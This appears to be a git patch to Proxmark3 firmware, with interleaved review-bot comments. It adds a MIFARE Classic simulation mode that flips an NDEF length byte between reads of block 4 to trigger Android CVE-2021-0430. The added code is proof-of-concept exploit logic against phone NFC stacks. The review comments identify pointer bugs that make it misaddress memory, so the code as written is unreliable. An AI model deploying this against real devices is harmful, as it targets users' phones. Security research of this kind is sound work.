From 218dbafdff0407c9831cfc5f6e6c5cb0fa3b5ebb Mon Sep 17 00:00:00 2001
From: iceman1001
Date: Mon, 3 May 2021 21:47:12 +0200
Subject: [PATCH] fiddling with simulating ndef messages on MFC and android
---
 armsrc/mifaresim.c | 45 ++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 44 insertions(+), 1 deletion(-)
diff --git a/armsrc/mifaresim.c b/armsrc/mifaresim.c
index e6810f8e9..ddfb10105 100644
--- a/armsrc/mifaresim.c
+++ b/armsrc/mifaresim.c
@@ -519,6 +519,9 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 LED_D_ON();
 ResetSspClk();
+ uint8_t *p_em = BigBuf_get_EM_addr();
+ uint8_t cve_flipper = 0;
+ int counter = 0;
 bool finished = false;
 bool button_pushed = BUTTON_PRESS();
@@ -561,6 +564,10 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 if (res == 2) { //Field is off! //FpgaDisableTracing();
+ if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+ p_em[1] = 0x21;
+ cve_flipper = 0;
+ }
 LEDsoff();
 cardSTATE = MFEMUL_NOFIELD;
 if (DBGLEVEL >= DBG_EXTENDED)
@@ -594,6 +601,11 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 LED_B_OFF();
 LED_C_OFF();
 cardSTATE = MFEMUL_SELECT;
+
+ if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+ p_em[1] = 0x21;
+ cve_flipper = 0;
+ }
 continue;
 }
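Review bot: `int counter = 0;` is introduced in this hunk but none of the patch's hunks reference it, so unless it is consumed by code outside the hunks it is dead and will draw an unused-variable warning; drop it or add the use in the same commit. The two locals that are used, `p_em` and `cve_flipper`, only matter when FLAG_CVE21_0430 is set, which the declaration site does not say; a comment such as `// FLAG_CVE21_0430 simulation state: p_em is the emulator-memory base, cve_flipper counts block-4 reads` would make that explicit. Mifare1ksim's body extends well past this hunk.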
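Review bot: `p_em[1] = 0x21;` indexes from the emulator-memory base returned by BigBuf_get_EM_addr(), so before any block-4 read it rewrites byte 1 of block 0 (normally part of the UID in emulator memory) rather than the NDEF TLV length byte of block 4 that the READBLOCK hunk's comment describes; the identical reset in the MFEMUL_SELECT hunk has the same problem. It is compounded by `p_em += blockNo * 16;` in the READBLOCK hunk, which moves the shared base pointer 64 bytes further on every block-4 read, so each later reset and comparison lands on a different block. Keep `p_em` as an unmodified base and address the byte explicitly: here and in the MFEMUL_SELECT hunk `p_em[4 * 16 + 1] = 0x21;`, and in the READBLOCK hunk `uint8_t *blk = p_em + blockNo * 16;` with `blk[1]` in place of `p_em[1]`. Since both reset sites are copies of the same four lines, a small static helper would keep them from drifting apart. The enclosing state machine continues outside the hunk.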
@@ -849,8 +861,39 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 // case MFEMUL_WORK => CMD READ block
 if (receivedCmd_len == 4 && receivedCmd_dec[0] == ISO14443A_CMD_READBLOCK) {
 blockNo = receivedCmd_dec[1];
- if (DBGLEVEL >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo);
+ if (DBGLEVEL >= DBG_EXTENDED)
+ Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo);
+
+ // android CVE 2021_0430
+ // Simulate a MFC 1K, with a NDEF message.
+ // these values uses the standard LIBNFC NDEF message
+ //
+ // In short, first a value read of block 4,
+ // update the length byte before second read of block 4.
+ // on iphone etc there might even be 3 reads of block 4.
+ // fiddling with when to flip the byte or not, has different effects
+ if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+
+ // first block
+ if (blockNo == 4) {
+
+ p_em += blockNo * 16;
+ // TLV in NDEF, flip length between
+ // 4 | 03 21 D1 02 1C 53 70 91 01 09 54 02 65 6E 4C 69
+ // 0xFF means long length
+ // 0xFE mean max short length
+
+ // We could also have a go at message len byte at p_em[4]...
+ if (p_em[1] == 0x21 && cve_flipper == 1) {
+ p_em[1] = 0xFE;
+ } else {
+ cve_flipper++;
+ }
+ }
+ }
+
 emlGetMem(response, blockNo, 1);
+
 if (DBGLEVEL >= DBG_EXTENDED) {
 Dbprintf("[MFEMUL_WORK - ISO14443A_CMD_READBLOCK] Data Block[%d]: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x", blockNo, response[0], response[1], response[2], response[3], response[4], response[5], response[6],